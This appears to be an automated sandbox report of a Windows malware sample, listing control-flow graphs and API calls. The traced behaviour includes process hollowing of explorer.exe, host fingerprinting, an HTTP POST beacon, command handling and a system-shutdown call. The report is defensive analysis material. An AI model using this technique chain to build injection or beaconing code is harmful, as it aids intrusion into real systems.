      control_flow_graph 506 5a6690-5a66d8 ObtainUserAgentString MultiByteToWideChar 507 5a66da-5a66df 506->507 508 5a66e1-5a66fd GetProcessHeap HeapAlloc 506->508 511 5a6719-5a6728 call 5a64d0 507->511 509 5a66ff-5a6715 MultiByteToWideChar 508->509 510 5a6717 508->510 509->511 510->511 514 5a672a-5a6742 InternetOpenW 511->514 515 5a6748-5a675f 514->515 516 5a68c6-5a68ca 514->516 517 5a6766-5a677b InternetSetOptionW 515->517 518 5a68cc-5a68d1 516->518 519 5a68d6-5a68e7 516->519 517->517 520 5a677d-5a679b InternetConnectW 517->520 518->514 521 5a68e9-5a68ef GetProcessHeap HeapFree 519->521 522 5a68f1-5a68f6 519->522 525 5a68b8-5a68c1 InternetCloseHandle 520->525 526 5a67a1-5a67d1 HttpOpenRequestW 520->526 521->522 523 5a68f8-5a68fe GetProcessHeap HeapFree 522->523 524 5a6900-5a6905 522->524 523->524 527 5a690f-5a6917 524->527 528 5a6907-5a690d GetProcessHeap HeapFree 524->528 525->519 531 5a68c3 525->531 529 5a68ac 526->529 530 5a67d7-5a67f8 InternetQueryOptionW 526->530 528->527 532 5a68b2-5a68b5 InternetCloseHandle 529->532 533 5a67fa-5a680a InternetSetOptionW 530->533 534 5a6810-5a6826 HttpSendRequestW 530->534 531->516 532->525 533->534 535 5a6828-5a682a 534->535 536 5a68a1-5a68aa InternetCloseHandle 534->536 537 5a6830-5a684b InternetQueryDataAvailable 535->537 536->532 538 5a684d-5a6855 537->538 539 5a6891-5a6893 537->539 540 5a6868-5a6872 GetProcessHeap HeapReAlloc 538->540 541 5a6857-5a6866 GetProcessHeap HeapAlloc 538->541 539->537 542 5a6895-5a689a 539->542 543 5a6878-5a688f InternetReadFile 540->543 541->543 544 5a689e 542->544 545 5a689c 542->545 543->539 544->536 545->544
      APIs
      • ObtainUserAgentString.URLMON(00000000,?,?), ref: 005A66B2
      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 005A66D2
      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 005A66EB
      • HeapAlloc.KERNEL32(00000000), ref: 005A66F2
      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 005A6713
      • InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005A6738
      • InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 005A6771
      • InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005A678E
      • HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 005A67C7
      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 005A67F0
      • InternetSetOptionW.WININET(00000000,0000001F,00003180,00000004), ref: 005A680A
      • HttpSendRequestW.WININET(00000000,Content-Type: application/octet-streamContent-Encoding: binary,000000FF,?,?), ref: 005A681E
      • InternetQueryDataAvailable.WININET(00000000,00000000,00000000,00000000), ref: 005A6840
      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 005A6859
      • HeapAlloc.KERNEL32(00000000), ref: 005A6860
      • GetProcessHeap.KERNEL32(00000008,?,00000000), ref: 005A686B
      • HeapReAlloc.KERNEL32(00000000), ref: 005A6872
      • InternetReadFile.WININET(00000000,00000000,00000000,00000000), ref: 005A6886
      • InternetCloseHandle.WININET(00000000), ref: 005A68A8
      • InternetCloseHandle.WININET(00000000), ref: 005A68B3
      • InternetCloseHandle.WININET(00000000), ref: 005A68B9
      • GetProcessHeap.KERNEL32(00000000,?), ref: 005A68EC
      • HeapFree.KERNEL32(00000000), ref: 005A68EF
      • GetProcessHeap.KERNEL32(00000000,?), ref: 005A68FB
      • HeapFree.KERNEL32(00000000), ref: 005A68FE
      • GetProcessHeap.KERNEL32(00000000,?), ref: 005A690A
      • HeapFree.KERNEL32(00000000), ref: 005A690D
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: Heap$Internet$Process$AllocCloseFreeHandleOption$ByteCharHttpMultiOpenQueryRequestWide$AgentAvailableConnectDataFileObtainReadSendStringUser
      • String ID: Content-Type: application/octet-streamContent-Encoding: binary$POST$`
      • API String ID: 2744214989-3343008755
      • Opcode ID: 7f20789120b70c8e0ad0ad395b16b20c145ec6793f8793a15f67126c84cd8d1d
      • Instruction ID: e57985d2628f7b147f4322881e66fcf2b6705a069a12c8567c40a02cd267267a
      • Opcode Fuzzy Hash: 7f20789120b70c8e0ad0ad395b16b20c145ec6793f8793a15f67126c84cd8d1d
      • Instruction Fuzzy Hash: B7716271A40219BBEB109BA4DC49FBEBBBCFF06710F144119FA11F7291DBB499049BA4
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 546 5a5ae0-5a5af3 547 5a5e48-5a5e50 546->547 548 5a5af9-5a5b1a GetModuleHandleW GetProcAddress 546->548 548->547 549 5a5b20-5a5b31 548->549 549->547 550 5a5b37-5a5b3e 549->550 551 5a5b40-5a5b45 550->551 552 5a5b47-5a5b4a 550->552 553 5a5b55 551->553 552->547 554 5a5b50 552->554 555 5a5b57-5a5b60 553->555 554->553 555->555 556 5a5b62 555->556 557 5a5b64-5a5b70 556->557 557->557 558 5a5b72-5a5b78 557->558 559 5a5b80-5a5b8e 558->559 559->559 560 5a5b90 559->560 561 5a5b92-5a5b9b 560->561 561->561 562 5a5b9d-5a5bd5 CreateProcessW 561->562 563 5a5bdb-5a5c1c NtQueryInformationProcess ReadProcessMemory GetThreadContext 562->563 564 5a5e3f-5a5e47 562->564 565 5a5e2f-5a5e3d CloseHandle * 2 563->565 566 5a5c22-5a5c2f 563->566 565->564 566->565 568 5a5c35-5a5c84 VirtualAllocEx WriteProcessMemory 566->568 569 5a5cbc-5a5cc0 568->569 570 5a5c86-5a5c97 568->570 573 5a5df0-5a5e29 WriteProcessMemory SetThreadContext ResumeThread 569->573 574 5a5cc6-5a5cd0 569->574 571 5a5c99-5a5cab WriteProcessMemory 570->571 572 5a5cad-5a5cb8 570->572 571->572 572->570 575 5a5cba 572->575 573->565 574->573 576 5a5cd6-5a5cd8 574->576 575->569 577 5a5ce0-5a5ce8 576->577 577->577 578 5a5cea-5a5cfd 577->578 579 5a5d1e-5a5d2e 578->579 580 5a5cff-5a5d04 578->580 582 5a5dd6-5a5de4 579->582 583 5a5d34-5a5d3f 579->583 581 5a5d06-5a5d11 580->581 581->582 586 5a5d17-5a5d19 581->586 582->576 585 5a5dea 582->585 584 5a5d40-5a5d53 583->584 587 5a5d59-5a5d5b 584->587 588 5a5dce-5a5dd0 584->588 585->573 586->581 589 5a5d1b 586->589 590 5a5d60-5a5d72 587->590 588->582 588->584 589->579 591 5a5dc0 590->591 592 5a5d74-5a5dbe ReadProcessMemory WriteProcessMemory 590->592 593 5a5dc3-5a5dc9 591->593 592->593 593->590 594 5a5dcb 593->594 594->588
      APIs
      • GetModuleHandleW.KERNEL32(ntdll,NtUnmapViewOfSection), ref: 005A5B03
      • GetProcAddress.KERNEL32(00000000), ref: 005A5B0A
      • CreateProcessW.KERNEL32(C:\Windows\system32\explorer.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000), ref: 005A5BCD
      • NtQueryInformationProcess.NTDLL ref: 005A5BEA
      • ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 005A5C04
      • GetThreadContext.KERNEL32(?,00010007), ref: 005A5C14
      • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040), ref: 005A5C48
      • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 005A5C72
      • WriteProcessMemory.KERNEL32(00000000,?,?,?,00000000,?,?,00000000), ref: 005A5CAB
      • ReadProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 005A5D92
      • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000004,00000000,?,?,00000000), ref: 005A5DAA
      • WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,00000000), ref: 005A5E05
      • SetThreadContext.KERNEL32(?,00010007,?,?,00000000), ref: 005A5E20
      • ResumeThread.KERNEL32(?,?,?,00000000), ref: 005A5E29
      • CloseHandle.KERNEL32(?), ref: 005A5E38
      • CloseHandle.KERNEL32(00000000), ref: 005A5E3D
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: Process$Memory$Write$HandleThread$CloseContextRead$AddressAllocCreateInformationModuleProcQueryResumeVirtual
      • String ID: .reloc$C:\Windows\system32\certutil.exe$C:\Windows\system32\explorer.exe$NtUnmapViewOfSection$ntdll
      • API String ID: 918112823-4001407722
      • Opcode ID: 19bbaf67179d01655aa5ce6aa13cc5cd06cea0f9532e950ffbff5d11b1b471f6
      • Instruction ID: 93f9c1a8c148125b4c0d8e9b7d4b21f7e89f7bfa49e308088af6798402ed0b81
      • Opcode Fuzzy Hash: 19bbaf67179d01655aa5ce6aa13cc5cd06cea0f9532e950ffbff5d11b1b471f6
      • Instruction Fuzzy Hash: 82B16C71E00619AFDF14CFA8DC84FAEBBB5FB49304F2440A5E905AB291E7319945CB64
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 674 5a8306-5a830d 675 5a8369-5a8419 GetVolumeInformationW StringFromGUID2 wsprintfA CreateMutexW GetLastError 674->675 676 5a830f-5a8324 674->676 679 5a841f-5a846d call 5a2490 WSAStartup CryptAcquireContextA 675->679 680 5a8511-5a8513 ExitProcess 675->680 677 5a8326-5a8367 InitializeCriticalSection call 5a7000 676->677 678 5a82a7-5a82b9 676->678 677->675 683 5a82bb 678->683 684 5a82de-5a82fb call 5a5600 Sleep 678->684 690 5a848f 679->690 691 5a846f-5a8489 CryptAcquireContextA 679->691 688 5a82bd-5a82bf 683->688 689 5a82c1-5a82db call 5a2600 call 5a7410 683->689 695 5a7d98-5a7db9 call 5a6690 684->695 688->684 688->689 689->684 694 5a8491-5a849f 690->694 691->680 691->690 694->694 698 5a84a1-5a84a5 694->698 704 5a7dbb-5a7dcb Sleep 695->704 705 5a7dcd-5a7ddb lstrcmpA 695->705 701 5a84c1-5a8510 CoInitializeEx ExpandEnvironmentStringsW CreateFileW 698->701 702 5a84a7 698->702 706 5a84b0-5a84bf 702->706 704->695 707 5a7dee-5a7e18 call 5a6440 * 2 call 5a6280 705->707 708 5a7ddd-5a7dec call 5a8f20 call 5a5600 705->708 706->701 706->706 719 5a829b-5a82b9 GetTickCount64 707->719 720 5a7e1e-5a7e20 707->720 708->695 719->683 719->684 720->719 721 5a7e26-5a7e2c 720->721 721->719 722 5a7e32-5a7ea5 call 5a5620 call 5a7430 call 5a2460 call 5a55e0 call 5a5620 call 5a6440 call 5a2600 call 5a7410 StrToIntA 721->722 739 5a7eab 722->739 740 5a8291-5a8299 call 5a5600 722->740 742 5a7eb2-5a7ec6 call 5a6440 * 2 739->742 743 5a8273-5a827a call 5a6200 739->743 740->684 742->740 752 5a7ecc-5a7ece 742->752 743->740 750 5a827c-5a828b InitiateSystemShutdownExW 743->750 750->740 752->740 753 5a7ed4-5a7efd StrToIntA call 5a6280 call 5a55e0 752->753 753->740 758 5a7f03-5a7f09 753->758 759 5a7f0b-5a7f4d GetSystemDirectoryW PathCombineW wnsprintfW 758->759 760 5a7f4f-5a7f52 758->760 761 5a7fa4-5a7feb GetModuleHandleA GetProcAddress * 2 759->761 760->761 762 5a7f54-5a7f6d call 5a6280 call 5a2740 760->762 763 5a7fed-5a7ff0 761->763 764 5a7ff3-5a7ff7 761->764 762->761 777 5a7f6f-5a7f9f ExpandEnvironmentStringsW wnsprintfW call 5a5600 762->777 763->764 766 5a7ff9-5a800e call 5a56d0 764->766 767 5a8031-5a8055 LoadLibraryA GetProcAddress 764->767 773 5a8059-5a805e 766->773 776 5a8010-5a802f call 5a6280 call 5a2630 call 5a5600 766->776 767->773 774 5a8060 773->774 775 5a8065-5a8077 call 5a55e0 773->775 774->775 783 5a8118-5a812f call 5a5600 * 3 775->783 784 5a807d-5a8102 call 5a8ec0 call 5a7430 wsprintfA wnsprintfA call 5a2460 call 5a6690 775->784 776->773 777->761 783->684 803 5a810b-5a8115 call 5a5600 784->803 804 5a8104-5a8106 call 5a5600 784->804 803->783 804->803
      APIs
      • Sleep.KERNEL32(00000000), ref: 005A7DC6
      • Sleep.KERNEL32(00000000), ref: 005A82F6
      • InitializeCriticalSection.KERNEL32(005AA080), ref: 005A8352
        • Part of subcall function 005A7000: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 005A7037
        • Part of subcall function 005A7000: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 005A7053
        • Part of subcall function 005A7000: GetProcessHeap.KERNEL32(00000008,?), ref: 005A7062
        • Part of subcall function 005A7000: HeapAlloc.KERNEL32(00000000), ref: 005A7069
        • Part of subcall function 005A7000: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 005A7086
        • Part of subcall function 005A7000: RegCloseKey.ADVAPI32(80000002), ref: 005A7098
      • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 005A837F
      • StringFromGUID2.OLE32(?,?,00000080), ref: 005A83D8
      • wsprintfA.USER32 ref: 005A83EF
      • CreateMutexW.KERNEL32(00000000,00000001,?), ref: 005A8403
      • GetLastError.KERNEL32 ref: 005A840E
      • WSAStartup.WS2_32(00000202,?), ref: 005A844C
      • CryptAcquireContextA.ADVAPI32(005AA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 005A8465
      • CryptAcquireContextA.ADVAPI32(005AA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000008), ref: 005A8481
      • CoInitializeEx.OLE32(00000000,00000000), ref: 005A84CC
      • ExpandEnvironmentStringsW.KERNEL32(%temp%\%paths%,?,00000104), ref: 005A84E3
      • CreateFileW.KERNEL32(?,10000000,00000000,00000000,00000002,04000080,00000000), ref: 005A8502
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: AcquireContextCreateCryptHeapInitializeQuerySleepValue$AllocCloseCriticalEnvironmentErrorExpandFileFromInformationLastMutexOpenProcessSectionStartupStringStringsVolumewsprintf
      • String ID: %temp%\%paths%$C:\$Microsoft Enhanced RSA and AES Cryptographic Provider
      • API String ID: 2004664451-2941900213
      • Opcode ID: 90b64a82f3c845b1e0d5cd9aece5b2c6bc2b364ee9055a5f82c971bfc9ddb195
      • Instruction ID: 0149498c2fc03daee805c59de0e8bb09e016553fe4a5a19efb32715f5b3c2f3f
      • Opcode Fuzzy Hash: 90b64a82f3c845b1e0d5cd9aece5b2c6bc2b364ee9055a5f82c971bfc9ddb195
      • Instruction Fuzzy Hash: C661F870A44309AFEB10DB60DC4DBADBFB8BF16704F1041A9E505EB182EBB45A48CB95
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 808 5a7640-5a7684 GetPEB LsaOpenPolicy 809 5a76fb-5a7749 GetComputerNameW GetUserNameW 808->809 810 5a7686-5a7697 LsaQueryInformationPolicy 808->810 811 5a775b-5a775d 809->811 812 5a774b 809->812 813 5a7699-5a769f 810->813 814 5a76f2-5a76f5 LsaClose 810->814 816 5a7760-5a7778 call 5a2490 811->816 815 5a7750-5a7759 812->815 817 5a76eb-5a76ec LsaFreeMemory 813->817 818 5a76a1-5a76bc GetProcessHeap HeapAlloc 813->818 814->809 815->811 815->815 825 5a777a-5a77e4 call 5a7430 wsprintfA * 2 816->825 817->814 820 5a76e8 818->820 821 5a76be-5a76cc 818->821 820->817 823 5a76ce-5a76d5 821->823 824 5a76e2-5a76e4 821->824 823->824 826 5a76d7-5a76e0 823->826 824->820 829 5a77e6-5a77f5 825->829 830 5a77f7-5a782b call 5a6690 825->830 826->824 826->826 829->829 829->830 833 5a782d-5a7833 GetProcessHeap HeapFree 830->833 834 5a7835-5a7837 830->834 833->834 835 5a7839-5a783f GetProcessHeap HeapFree 834->835 836 5a7841-5a7847 834->836 835->836
      APIs
      • LsaOpenPolicy.ADVAPI32(00000000,005AA060,00000001,?), ref: 005A767C
      • LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 005A768F
      • GetProcessHeap.KERNEL32(00000008,?), ref: 005A76AB
      • HeapAlloc.KERNEL32(00000000), ref: 005A76B2
      • LsaFreeMemory.ADVAPI32(?), ref: 005A76EC
      • LsaClose.ADVAPI32(?), ref: 005A76F5
      • GetComputerNameW.KERNEL32(?,?), ref: 005A7714
      • GetUserNameW.ADVAPI32(?,00000101), ref: 005A7725
      • wsprintfA.USER32 ref: 005A77A6
      • wsprintfA.USER32 ref: 005A77D9
      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A7830
      • HeapFree.KERNEL32(00000000), ref: 005A7833
      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005A783C
      • HeapFree.KERNEL32(00000000), ref: 005A783F
      Strings
      • %d|%s|%.16s|, xrefs: 005A77A0
      • %s|%d.%d (%d)|%S|%S|%S, xrefs: 005A77D3
      • 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 005A7736
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: Heap$FreeProcess$NamePolicywsprintf$AllocCloseComputerInformationMemoryOpenQueryUser
      • String ID: %d|%s|%.16s|$%s|%d.%d (%d)|%S|%S|%S$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
      • API String ID: 3257352186-369990036
      • Opcode ID: 4288cabd0b41a18e7e64004c453c2c71f10ab25cb7f3fd9fcce6882d891ab45a
      • Instruction ID: 5f6fae09400d5668bd764a8a4b43a857be9c2ea636a3c600fec5f57f85fab98e
      • Opcode Fuzzy Hash: 4288cabd0b41a18e7e64004c453c2c71f10ab25cb7f3fd9fcce6882d891ab45a
      • Instruction Fuzzy Hash: B451B271A0025DAFEB11DFA4CC48BAFBFB9FF4A300F0440A5E944A7152D7709A45DBA0
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 837 5a7850-5a7864 838 5a78c8-5a78e0 837->838 839 5a7866-5a786e 837->839 841 5a78ea-5a78ec 838->841 842 5a78e2-5a78e8 838->842 839->838 840 5a7870-5a7878 839->840 844 5a7880-5a788a 840->844 843 5a78f0-5a7905 call 5a2490 841->843 842->841 842->842 852 5a7907-5a7968 call 5a7430 wnsprintfA wsprintfA 843->852 846 5a788c-5a788e 844->846 847 5a7897-5a789e StrCmpNIA 844->847 846->847 849 5a7890-5a7895 846->849 850 5a78a0-5a78ad 847->850 851 5a78b1-5a78c2 847->851 849->847 849->849 850->844 853 5a78af 850->853 851->838 854 5a7d34-5a7d3a 851->854 857 5a796a 852->857 858 5a7981-5a79aa call 5a6690 852->858 853->838 859 5a7970-5a797f 857->859 858->854 862 5a79b0 858->862 859->858 859->859 863 5a79b2-5a79bb 862->863 864 5a79c0-5a79c8 863->864 865 5a79ca-5a79cc 864->865 866 5a79d0-5a79d2 864->866 865->864 867 5a79ce 865->867 868 5a79d4-5a79e0 866->868 869 5a79e5-5a79eb 866->869 867->863 870 5a7a9a-5a7aab 868->870 871 5a79f0-5a79f8 869->871 872 5a7d22-5a7d2e GetProcessHeap HeapFree 870->872 873 5a7ab1-5a7ab3 870->873 874 5a79fa-5a79fc 871->874 875 5a7a00-5a7a02 871->875 872->854 873->872 876 5a7ab9-5a7ac0 873->876 874->871 877 5a79fe 874->877 878 5a7a08 875->878 879 5a7a04-5a7a06 875->879 876->872 880 5a7ac6 876->880 877->869 881 5a7a0b-5a7a13 878->881 879->881 882 5a7ac8-5a7ad3 880->882 883 5a7a21 881->883 884 5a7a15-5a7a1c 881->884 882->882 885 5a7ad5-5a7ae4 call 5a7430 882->885 886 5a7a24-5a7a2f 883->886 884->870 895 5a7ae6-5a7af5 885->895 896 5a7af7-5a7afd 885->896 888 5a7a30-5a7a38 886->888 890 5a7a3a-5a7a3c 888->890 891 5a7a40-5a7a42 888->891 890->888 892 5a7a3e 890->892 893 5a7a50-5a7a5b 891->893 894 5a7a44-5a7a4e 891->894 892->886 898 5a7a60-5a7a68 893->898 897 5a7a97 894->897 895->895 895->896 899 5a7d1b-5a7d1d call 5a5ae0 896->899 900 5a7b03-5a7b06 896->900 897->870 901 5a7a6a-5a7a6c 898->901 902 5a7a70-5a7a72 898->902 899->872 903 5a7b0c-5a7b0f 900->903 904 5a7d10-5a7d19 call 5a5e60 900->904 901->898 906 5a7a6e 901->906 907 5a7a78 902->907 908 5a7a74-5a7a76 902->908 903->872 910 5a7b15-5a7b1a 903->910 904->872 906->893 911 5a7a7b-5a7a85 907->911 908->911 910->872 913 5a7b20-5a7b28 910->913 911->897 914 5a7a87-5a7a89 911->914 915 5a7b3a-5a7b3e 913->915 916 5a7b2a 913->916 914->897 919 5a7a8b 914->919 917 5a7b52-5a7b5c 915->917 918 5a7b40-5a7b50 915->918 920 5a7b30-5a7b38 916->920 921 5a7b60-5a7b68 917->921 918->917 918->918 922 5a7a90-5a7a95 919->922 920->915 920->920 921->921 923 5a7b6a-5a7b6e 921->923 922->897 922->922 924 5a7b82-5a7b98 call 5a58b0 923->924 925 5a7b70-5a7b80 923->925 924->872 928 5a7b9e-5a7bc5 924->928 925->924 925->925 928->872 929 5a7bcb 928->929 930 5a7bd0-5a7be3 lstrcmpA 929->930 931 5a7bf6-5a7c08 930->931 932 5a7be5-5a7bef 930->932 931->872 934 5a7c0e-5a7c12 931->934 932->930 933 5a7bf1 932->933 933->872 935 5a7c1b-5a7c48 EnterCriticalSection 934->935 936 5a7c14-5a7c19 934->936 938 5a7c4a-5a7c52 935->938 939 5a7c68-5a7c6c 935->939 936->935 936->936 940 5a7c55-5a7c58 938->940 941 5a7c6e 939->941 942 5a7c84-5a7c94 939->942 943 5a7c5a-5a7c60 940->943 944 5a7c62 940->944 945 5a7c70-5a7c74 941->945 946 5a7c96-5a7ca5 GetProcessHeap HeapAlloc 942->946 947 5a7ca7-5a7cb1 GetProcessHeap HeapReAlloc 942->947 943->940 943->944 944->939 949 5a7c80-5a7c82 945->949 950 5a7c76-5a7c7c 945->950 948 5a7cb7-5a7cc1 946->948 947->948 951 5a7d03-5a7d0e LeaveCriticalSection 948->951 952 5a7cc3-5a7cd7 948->952 949->942 954 5a7cda-5a7ce1 949->954 950->945 953 5a7c7e 950->953 951->872 952->954 953->942 955 5a7cff 954->955 956 5a7ce3-5a7ce5 954->956 955->951 957 5a7cee-5a7cf2 956->957 958 5a7ce7-5a7cec 956->958 957->955 959 5a7cf4-5a7cfd 957->959 958->957 958->958 959->955 959->959
      APIs
      • StrCmpNIA.SHLWAPI(?,?,00000000), ref: 005A789A
      • wnsprintfA.SHLWAPI ref: 005A7932
      • wsprintfA.USER32 ref: 005A7959
      • lstrcmpA.KERNEL32(?,Start), ref: 005A7BDB
      • EnterCriticalSection.KERNEL32(005AA080), ref: 005A7C34
      • GetProcessHeap.KERNEL32(00000008,?), ref: 005A7C98
      • HeapAlloc.KERNEL32(00000000), ref: 005A7C9F
      • GetProcessHeap.KERNEL32(00000008,?,?), ref: 005A7CAA
      • HeapReAlloc.KERNEL32(00000000), ref: 005A7CB1
      • LeaveCriticalSection.KERNEL32(005AA080), ref: 005A7D08
        • Part of subcall function 005A5E60: GetModuleHandleW.KERNEL32(ntdll), ref: 005A5E7D
        • Part of subcall function 005A5E60: GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 005A5E91
        • Part of subcall function 005A5E60: GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 005A5E9C
        • Part of subcall function 005A5E60: GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 005A5EA7
        • Part of subcall function 005A5E60: GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 005A5EB2
        • Part of subcall function 005A5E60: GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 005A5EBD
        • Part of subcall function 005A5E60: GetTempPathW.KERNEL32(000000F6,?), ref: 005A5ED6
        • Part of subcall function 005A5E60: wnsprintfW.SHLWAPI ref: 005A5F11
        • Part of subcall function 005A5E60: PathCombineW.SHLWAPI(?,?,?), ref: 005A5F2B
        • Part of subcall function 005A5E60: CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 005A5F52
        • Part of subcall function 005A5E60: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 005A5F76
        • Part of subcall function 005A5E60: SetEndOfFile.KERNEL32(00000000), ref: 005A5F79
        • Part of subcall function 005A5E60: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005A5F86
        • Part of subcall function 005A5E60: wnsprintfW.SHLWAPI ref: 005A5FA4
      • GetProcessHeap.KERNEL32(00000000,?), ref: 005A7D27
      • HeapFree.KERNEL32(00000000), ref: 005A7D2E
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2027880689.00000000005A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005A0000, based on PE: true
      • Associated: 00000000.00000002.2027837170.00000000005A0000.00000002.00001000.00020000.00000000.sdmpDownload File
      • Associated: 00000000.00000002.2027901013.00000000005AB000.00000002.00001000.00020000.00000000.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_5a0000_SecuriteInfo.jbxd
      Similarity
      • API ID: Heap$AddressProc$File$Processwnsprintf$AllocCriticalPathSection$CombineCreateEnterFreeHandleLeaveModulePointerTempWritelstrcmpwsprintf
      • String ID: %d|%s|%.16s|$%s|%s$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ$Start
      • API String ID: 851647271-3778496198
      • Opcode ID: 53abe37945268fc5fa3ec6b6b1281408828d3644a28646fe7fe9fd67992309f7
      • Instruction ID: 817fe1e105b9daadb563ecf18f90add3807d09d21182fdd01d06bd8b87e13f33
      • Opcode Fuzzy Hash: 53abe37945268fc5fa3ec6b6b1281408828d3644a28646fe7fe9fd67992309f7
      • Instruction Fuzzy Hash: 7BE1E430A0825E9FDB298F68CC5477E7FA6BF9B700F1981ADD85697242EB308D45C790
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • InitializeCriticalSection.KERNEL32(005AA080), ref: 005A8352
        • Part of subcall function 005A7000: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 005A7037
        • Part of subcall function 005A7000: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 005A7053
        • Part of subcall function 005A7000: GetProcessHeap.KERNEL32(00000008,?), ref: 005A7062
        • Part of subcall function 005A7000: HeapAlloc.KERNEL32(00000000), ref: 005A7069
        • Part of subcall function 005A7000: RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 005A7086
        • Part of subcall function 005A7000: RegCloseKey.ADVAPI32(80000002), ref: 005A7098
      • GetVolumeInformationW.KERNEL32(C:\,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 005A837F
      • StringFromGUID2.OLE32(?,?,00000080), ref: 005A83D8
      • wsprintfA.USER32 ref: 005A83EF
      • CreateMutexW.KERNEL32(00000000,00000001,?), ref: 005A8403
      • GetLastError.KERNEL32 ref: 005A840E
      • ExitProcess.KERNEL32 ref: 005A8513
        • Part of subcall function 005A2490: GetTickCount.KERNEL32 ref: 005A2492
      • WSAStartup.WS2_32(00000202,?), ref: 005A844C
      • CryptAcquireContextA.ADVAPI32(005AA4EC,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 005A8465
